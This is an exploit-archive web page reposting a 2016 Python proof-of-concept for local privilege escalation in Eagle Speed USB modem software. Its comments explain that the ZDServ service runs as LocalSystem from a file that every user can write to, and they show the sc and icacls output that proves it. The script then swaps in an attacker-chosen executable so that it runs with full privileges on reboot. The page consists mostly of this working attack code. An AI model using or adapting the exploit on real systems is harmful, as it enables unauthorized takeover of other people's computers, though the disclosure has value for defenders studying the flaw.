首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Eagle Speed USB Modem Software Privilege Escalation
来源:https://infogen.al 作者:R-73eN 发布时间:2016-11-29  

#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
#        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
#        START_TYPE         : 2   AUTO_START
#        ERROR_CONTROL      : 1   NORMAL
#        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
#        LOAD_ORDER_GROUP   :
#        TAG                : 0
#        DISPLAY_NAME       : ZDServ
#        DEPENDENCIES       :
#        SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
#                                           NT AUTHORITY\SYSTEM:(I)(F)
#                                           BUILTIN\Administrators:(I)(F)
#                                          Victim-PC\lowpriv:(I)(F)
#                                           BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#

import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner


if(len(sys.argv) < 2):
    print '\n Usage : exploit.py program.exe\n'
    print 'https://infogen.al/'
else:
    program = sys.argv[1]
    if(not os.path.isfile(program)):
        print "[-] The parameter was incorrect, use a correct filename [-]"
        exit(0)
    if(not os.path.isfile(path)):
        print "[-] File not found , propably service doesn't exists [-]\n"
    else:
        print "[+] Backing up the binary [+]"
        os.system(file_move)
        print "[+] Copying the payload [+]"
        os.system("copy " + program + " " + path)
        if(filecmp.cmp(program,path)):
            print "[+] Exploit successfull, wait for service to restart or reboot [+]"
        else:
            print "[-] Exploit failed [-]"
   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Android - 'BadKernel' Remote C
·Microsoft Internet Explorer 8
·Linux Kernel 2.6.22 < 3.9 - 'D
·Microsoft Internet Explorer 10
·WinPower 4.9.0.4 - Privilege E
·Microsoft Internet Explorer 11
·Google Chrome Accessibility bl
·Microsoft Internet Explorer 8
·Xitami Web Server 5.0a0 - Deni
·NTP 4.2.8p3 - Denial of Servic
·ntpd 4.2.8 Stack Overflow Proo
·Linux Kernel 2.6.22 < 3.9 - 'D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved